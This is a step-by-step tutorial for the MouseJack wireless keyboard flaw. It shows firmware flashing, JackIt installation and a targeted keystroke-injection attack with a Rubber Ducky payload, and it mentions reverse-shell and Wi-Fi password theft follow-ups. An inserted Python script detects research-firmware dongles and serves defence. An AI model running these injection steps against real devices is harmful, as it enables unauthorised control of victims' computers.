MouseJack vulnerabilities were reported more than three years ago. Some manufacturers of wireless keyboards have since released firmware updates, but millions (if not billions) of keyboards worldwide remain unpatched, either because they cannot be updated or because the manufacturer never bothered to release a fix.
According to Bastille, "MouseJack is a vulnerability class that affects the vast majority of wireless keyboards and mice without Bluetooth." Led by Marc Newlin, the MouseJack research exploits the willingness of a USB dongle (seen below) to accept unencrypted keystrokes from surrounding devices.
Step 1: Flashing the firmware
~ $ apt-get update
Several dependencies are required to run the Python scripts that build the firmware and automate the flashing process. Use the following apt-get command to make sure Git, Python and the other required packages are installed and up to date.
~ $ apt-get install sdcc binutils python python-pip git
Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version (2.7.16-1).
python-pip is already the newest version (18.1-5).
The following packages were automatically installed and are no longer required:
  libpython3.6-minimal libpython3.6-stdlib python3.6 python3.6-minimal
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
  binutils-common binutils-x86-64-linux-gnu gputils gputils-common gputils-doc libbinutils sdcc-doc sdcc-libraries
Suggested packages:
  binutils-doc sdcc-ucsim
The following NEW packages will be installed:
  gputils gputils-common gputils-doc sdcc sdcc-doc sdcc-libraries
The following packages will be upgraded:
  binutils binutils-common binutils-x86-64-linux-gnu libbinutils
4 upgraded, 6 newly installed, 0 to remove and 108 not upgraded.
Need to get 9,868 kB of archives.
After this operation, 63.7 MB of additional disk space will be used.
Do you want to continue? [Y/n]
The version of PIP available in the Kali repository may be outdated. Update it with the following command.
~ $ pip install --upgrade pip
Collecting pip
  Downloading https://files.pythonhosted.org/packages/f9/fb/863012b13912709c13cf5cfdbfb304fa6c727659d6290438e1a88df9d848/pip-19.1-py2.py3-none-any.whl (1.4MB)
    100% |████████████████████████████████| 1.4MB 114kB/s
Installing collected packages: pip
  Found existing installation: pip 18.1
    Not uninstalling pip at /usr/lib/python2.7/dist-packages, outside environment /usr
    Can't uninstall 'pip'. No files were found to uninstall.
Successfully installed pip-19.1
Further dependencies must be installed with pip. Use the -I (ignore installed) option when installing the PyUSB package, a Python USB access module.
~ $ pip install --upgrade -I pyusb
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7.
Collecting pyusb
  Downloading https://files.pythonhosted.org/packages/5f/34/2095e821c01225377dda4ebdbd53d8316d6abb243c9bee43d3888fa91dd6/pyusb-1.0.2.tar.gz (54kB)
     |████████████████████████████████| 61kB 82kB/s
Building wheels for collected packages: pyusb
  Building wheel for pyusb (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/1f/a9/7e/d189b5030ee3a56f9b72c28281bb11d661b8ea312e28de08a5
Successfully built pyusb
Installing collected packages: pyusb
Successfully installed pyusb-1.0.2
Finally, install the latest PlatformIO package, an open source ecosystem for IoT development.
~ $ pip install --upgrade platformio
Collecting platformio
  Downloading https://files.pythonhosted.org/packages/fe/01/69aa7d8ef8cd74493338396ff86dc1bbfe85ae58b77fc705924c920a38eb/platformio-3.6.7-py27-none-any.whl (161kB)
     |████████████████████████████████| 163kB 92kB/s
Collecting pyserial!=3.3,<4,>=3 (from platformio)
  Downloading https://files.pythonhosted.org/packages/0d/e4/2a744dd9e3be04a0c0907414e2a01a7c88bb3915cbe3c8cc06e209f59c30/pyserial-3.4-py2.py3-none-any.whl (193kB)
     |████████████████████████████████| 194kB 179kB/s
Requirement already satisfied, skipping upgrade: requests<3,>=2.4.0 in /usr/lib/python2.7/dist-packages (from platformio) (2.21.0)
Collecting click<6,>=5 (from platformio)
  Downloading https://files.pythonhosted.org/packages/8f/98/14966b6d772fd5fba1eb3bb34a62a7f736d609572493397cdc5715c14514/click-5.1-py2.py3-none-any.whl (65kB)
     |████████████████████████████████| 71kB 188kB/s
Requirement already satisfied, skipping upgrade: colorama in /usr/lib/python2.7/dist-packages (from platformio) (0.3.7)
Collecting bottle<0.13 (from platformio)
  Downloading https://files.pythonhosted.org/packages/32/4e/ed046324d5ec980c252987c1dca191e001b9f06ceffaebf037eef469937c/bottle-0.12.16.tar.gz (72kB)
     |████████████████████████████████| 81kB 153kB/s
Collecting semantic_version<3,>=2.5.0 (from platformio)
  Downloading https://files.pythonhosted.org/packages/72/83/f76958017f3094b072d8e3a72d25c3ed65f754cc607fdb6a7b33d84ab1d5/semantic_version-2.6.0.tar.gz
Building wheels for collected packages: bottle, semantic-version
  Building wheel for bottle (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/0c/68/ac/1546dcb27101ca6c4e50c5b5da92dbd3307f07cda5d88e81c7
  Building wheel for semantic-version (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/60/bb/50/215d669d31f992767f5dd8d3c974e79261707ee7f898f0dc10
Successfully built bottle semantic-version
Installing collected packages: pyserial, click, bottle, semantic-version, platformio
  Found existing installation: click 7.0
    Uninstalling click-7.0:
      Successfully uninstalled click-7.0
Successfully installed bottle-0.12.16 click-5.1 platformio-3.6.7 pyserial-3.4 semantic-version-2.6.0
Step 2: Clone the MouseJack repository
~ $ git clone https://github.com/BastilleResearch/mousejack /opt/mousejack
Cloning into '/opt/mousejack'...
remote: Enumerating objects: 285, done.
remote: Total 285 (delta 0), reused 0 (delta 0), pack-reused 285
Receiving objects: 100% (285/285), 8.63 MiB | 353.00 KiB/s, done.
Resolving deltas: 100% (131/131), done.
Change to the new mousejack/ directory.
~ $ cd /opt/mousejack/
Use git submodule init to initialize the local configuration file for the nrf-research-firmware submodule. This is the firmware that is flashed to the nRF24LU1+ device.
/opt/mousejack $ git submodule init
Submodule 'nrf-research-firmware' (https://github.com/BastilleResearch/nrf-research-firmware.git) registered for path 'nrf-research-firmware'
Then use git submodule update to fetch the submodule's data and check out the commit recorded in the superproject.
/opt/mousejack $ git submodule update
Cloning into '/opt/mousejack/nrf-research-firmware'...
Submodule path 'nrf-research-firmware': checked out '02b84d1c4e59c0fb98263c83b2e7c7f9863a3b93'
Change to the nrf-research-firmware/ directory.
/opt/mousejack $ cd nrf-research-firmware/
Use the make command to run the build steps in the Makefile.
/nrf-research-firmware $ make
mkdir -p bin
sdcc --model-large --std-c99 -c src/main.c -o bin/main.rel
sdcc --model-large --std-c99 -c src/usb.c -o bin/usb.rel
sdcc --model-large --std-c99 -c src/usb_desc.c -o bin/usb_desc.rel
sdcc --model-large --std-c99 -c src/radio.c -o bin/radio.rel
sdcc --xram-loc 0x8000 --xram-size 2048 --model-large bin/main.rel bin/usb.rel bin/usb_desc.rel bin/radio.rel -o bin/dongle.ihx
objcopy -I ihex bin/dongle.ihx -O binary bin/dongle.bin
objcopy --pad-to 26622 --gap-fill 255 -I ihex bin/dongle.ihx -O binary bin/dongle.formatted.bin
objcopy -I binary bin/dongle.formatted.bin -O ihex bin/dongle.formatted.ihx
At this point, the nRF24LU1+ device should be plugged into the computer. Then run make install.
/nrf-research-firmware $ make install
./prog/usb-flasher/usb-flash.py bin/dongle.bin
[2019-04-25 23:55:44.351] Looking for a compatible device that can jump to the Nordic bootloader
[2019-04-25 23:55:44.378] Device found, jumping to the Nordic bootloader
[2019-04-25 23:55:44.969] Looking for a device running the Nordic bootloader
[2019-04-25 23:55:45.171] Writing image to flash
[2019-04-25 23:55:45.808] Verifying write
[2019-04-25 23:55:45.867] Firmware programming completed successfully
[2019-04-25 23:55:45.867] Please unplug your dongle or breakout board and plug it back in.
Unplug the nRF24LU1+ from the computer as instructed. To check that the firmware was flashed, plug the nRF24LU1+ back in and run dmesg. The Product and Manufacturer lines should read "Research Firmware" and "RFStorm".
/nrf-research-firmware $ dmesg
[ 2433.986481] usb 2-1: new full-speed USB device number 3 using xhci_hcd
[ 2434.136930] usb 2-1: New USB device found, idVendor=1915, idProduct=0102, bcdDevice= 0.01
[ 2434.136938] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2434.136942] usb 2-1: Product: Research Firmware
[ 2434.136946] usb 2-1: Manufacturer: RFStorm
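The same dmesg check can be scripted. The following Python example is added here and is not part of the original article or of the MouseJack/JackIt projects. It groups USB dmesg lines by port, extracts the idVendor/idProduct pair and the Product/Manufacturer strings, and flags any device that matches the research firmware either by the 1915:0102 identifiers shown above or by the "Research Firmware"/"RFStorm" strings. Besides confirming a successful flash, the same logic lets an administrator notice when such a dongle is plugged into a managed host. The sample log text is constructed; the second device, with idVendor abcd and idProduct 1234, is a placeholder for an unrelated receiver, not a real product ID.

```python
import re
from collections import defaultdict

# Constructed sample dmesg text, modelled on the output shown in the article.
# Port 2-1 is the reflashed nRF24LU1+; port 2-2 is a placeholder receiver with
# made-up identifiers so the matcher has a negative case to ignore.
SAMPLE_DMESG = """\
[ 2433.986481] usb 2-1: new full-speed USB device number 3 using xhci_hcd
[ 2434.136930] usb 2-1: New USB device found, idVendor=1915, idProduct=0102, bcdDevice= 0.01
[ 2434.136938] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2434.136942] usb 2-1: Product: Research Firmware
[ 2434.136946] usb 2-1: Manufacturer: RFStorm
[ 2501.110223] usb 2-2: new full-speed USB device number 4 using xhci_hcd
[ 2501.260001] usb 2-2: New USB device found, idVendor=abcd, idProduct=1234, bcdDevice= 1.00
[ 2501.260010] usb 2-2: Product: Example Receiver
[ 2501.260014] usb 2-2: Manufacturer: Example Corp
"""

# "[ 2434.136930] usb 2-1: <message>"  ->  port "2-1", message text
LINE_RE = re.compile(r"^\[\s*[\d.]+\]\s+usb (?P<port>\S+): (?P<msg>.*)$")
IDS_RE = re.compile(r"idVendor=(?P<vid>[0-9a-fA-F]{4}), idProduct=(?P<pid>[0-9a-fA-F]{4})")

# Identifiers reported by the nrf-research-firmware dongle in the dmesg output above.
RESEARCH_VID_PID = ("1915", "0102")
RESEARCH_PRODUCT = "Research Firmware"
RESEARCH_MANUFACTURER = "RFStorm"


def parse_dmesg(text):
    """Return {port: {"vid", "pid", "product", "manufacturer"}} for every USB
    device that appears in the given dmesg text; missing keys are simply absent."""
    devices = defaultdict(dict)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a usb-subsystem line
        port, msg = m.group("port"), m.group("msg")
        ids = IDS_RE.search(msg)
        if ids:
            devices[port]["vid"] = ids.group("vid").lower()
            devices[port]["pid"] = ids.group("pid").lower()
        elif msg.startswith("Product: "):
            devices[port]["product"] = msg[len("Product: "):].strip()
        elif msg.startswith("Manufacturer: "):
            devices[port]["manufacturer"] = msg[len("Manufacturer: "):].strip()
    return dict(devices)


def find_research_dongles(text):
    """Return [(port, reason)] for devices matching the research firmware.
    The VID/PID pair is checked first because descriptor strings are just text
    the firmware reports and are the easier of the two to change."""
    hits = []
    for port, dev in parse_dmesg(text).items():
        by_id = (dev.get("vid"), dev.get("pid")) == RESEARCH_VID_PID
        by_str = (dev.get("product") == RESEARCH_PRODUCT
                  or dev.get("manufacturer") == RESEARCH_MANUFACTURER)
        if by_id or by_str:
            hits.append((port, "vid/pid" if by_id else "strings"))
    return hits


if __name__ == "__main__":
    for port, reason in find_research_dongles(SAMPLE_DMESG):
        print("research firmware dongle on usb %s (matched by %s)" % (port, reason))
```

On a live system, feed the script the output of dmesg (or the kernel log) instead of SAMPLE_DMESG; the regexes only rely on the standard usb-subsystem line format, so they work unchanged on real output.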
Step 3: Cloning the JackIt Repository
Now that the nRF24LU1+ device is set up, you can scan the surroundings for wireless mice and keyboards. The MouseJack repository contains several useful Python scripts, but this guide uses the JackIt script instead, which automates keystroke injection.
JackIt was developed by phikshun and infamy and is an automation tool that drives MouseJack with USB Rubber Ducky scripts.
First, download the JackIt repository.
~ $ git clone https://github.com/insecurityofthings/jackit.git /opt/jackit
Cloning into '/opt/jackit'...
remote: Enumerating objects: 718, done.
remote: Total 718 (delta 0), reused 0 (delta 0), pack-reused 718
Receiving objects: 100% (718/718), 171.39 KiB | 153.00 KiB/s, done.
Resolving deltas: 100% (439/439), done.
Change to the new jackit/ directory.
~ $ cd /opt/jackit/
List the contents of the directory.
/opt/jackit $ ls -la
total 48
drwxr-xr-x 6 root root 4096 Apr 26 22:25 .
drwxr-xr-x 6 root root 4096 Apr 26 22:25 ..
drwxr-xr-x 2 root root 4096 Apr 26 22:25 bin
drwxr-xr-x 2 root root 4096 Apr 26 22:25 examples
drwxr-xr-x 8 root root 4096 Apr 26 22:25 .git
-rw-r--r-- 1 root root 1072 Apr 26 22:25 .gitignore
drwxr-xr-x 5 root root 4096 Apr 26 22:25 jackit
-rw-r--r-- 1 root root 4743 Apr 26 22:25 README.md
-rw-r--r-- 1 root root   52 Apr 26 22:25 requirements.txt
-rwxr-xr-x 1 root root  594 Apr 26 22:25 setup.py
-rw-r--r-- 1 root root  289 Apr 26 22:25 tox.ini
There is a "requirements.txt" file, which indicates that several dependencies need to be installed with pip. Installing the package in editable mode pulls them in and installs JackIt itself; that completes the setup.
/opt/jackit $ pip install -e .
Obtaining file:///opt/jackit
Requirement already satisfied: click==5.1 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (5.1)
Collecting pyusb==1.0.0 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/8a/19/66fb48a4905e472f5dfeda3a1bafac369fbf6d6fc5cf55b780864962652d/PyUSB-1.0.0.tar.gz (52kB)
     |████████████████████████████████| 61kB 81kB/s
Collecting six==1.10.0 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/c8/0a/b6723e1bc4c516cb687841499455a8505b44607ab535be01091c0f24f079/six-1.10.0-py2.py3-none-any.whl
Collecting tabulate==0.7.5 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/db/40/6ffc855c365769c454591ac30a25e9ea0b3e8c952a1259141f5b9878bd3d/tabulate-0.7.5.tar.gz
Building wheels for collected packages: pyusb, tabulate
  Building wheel for pyusb (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/a6/69/c7/258e736ee9bdb4553bd9701424b259436b979cf96201af612f
  Building wheel for tabulate (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/96/9c/9a/369b6376b11523584a6040a89488c28f0f88cb52167dceb648
Successfully built pyusb tabulate
Installing collected packages: pyusb, six, tabulate, JackIt
  Found existing installation: pyusb 1.0.2
    Uninstalling pyusb-1.0.2:
      Successfully uninstalled pyusb-1.0.2
  Found existing installation: six 1.12.0
    Uninstalling six-1.12.0:
      Successfully uninstalled six-1.12.0
  Running setup.py develop for JackIt
Successfully installed JackIt pyusb-1.0.0 six-1.10.0 tabulate-0.7.5
Scan the surroundings for vulnerable devices by simply running jackit in any terminal.
~ $ jackit
(JackIt banner)
JackIt Version 1.00
Created by phikshun, infamy
[!] You must specify a ducky script with --script.
[!] Attacks are disabled.
[+] Starting scan...
[+] Scanning every 5s CTRL-C when ready.

KEY  ADDRESS         CHANNELS  COUNT  SEEN         TYPE          PACKET
---  --------------  --------  -----  -----------  ------------  -----------------------------
1    C7:D4:21:98:07  74        3      0:00:07 ago  Logitech HID  00:C2:00:00:03:10:00:00:00:2B
JackIt continuously scans the area for wireless mice and keyboards. A vulnerable device is listed in the terminal with its address (serial number), channel and type. This information can be used for a targeted attack. For example, the following USB Rubber Ducky payload opens a Run window and types into the target computer.
GUI r
DELAY 1000
STRING Powershell
To use the USB Rubber Ducky script with JackIt, use the following command.
~ $ jackit --reset --address C7:D4:21:98:07 --vendor Logitech --script /path/to/ducky/script.txt
Press Ctrl + C to stop the scan. JackIt then asks which address the keystrokes should be sent to. Because this is a targeted attack, only one serial number appears in the scan. Press 1 and then Enter.
[+] Sniffing for C7:D4:21:98:07 every 5s CTRL-C when ready.

KEY  ADDRESS         CHANNELS  COUNT  SEEN         TYPE          PACKET
---  --------------  --------  -----  -----------  ------------  --------------------------------
1    C7:D4:21:98:07  2         1      0:00:10 ago  Logitech HID  00:C2:00:00:00:00:00:00:00:00:00
^C
[+] Select target keys (1-1) separated by commas, or 'all': [all]: 1
[+] Ping success on channel 65
[+] Sending attack to C7:D4:21:98:07 [Logitech HID] on channel 65
[+] All attacks completed
When the keystrokes are injected, the target device executes the commands in the Ducky script: it opens the Run window and types the string given in the script. More complex PowerShell attacks can include exfiltrating Wi-Fi passwords, streaming the Windows 10 desktop, and Powercat reverse shells with the payload hosted on Microsoft servers.
Since Marc and Bastille released the MouseJack white paper in 2016, some manufacturers have released firmware updates for products that do not use one-time programmable (PROM) memory. Most vulnerable USB dongles cannot be patched because of this hardware limitation. This is not the case for Logitech devices, which can be patched but must be updated manually. Other manufacturers have yet to push firmware updates, and an unknown number of vulnerable products remain in use worldwide.
Thank you for reading! If you have any questions, you can leave a comment here or send me a message on Twitter @tokyoneon_ .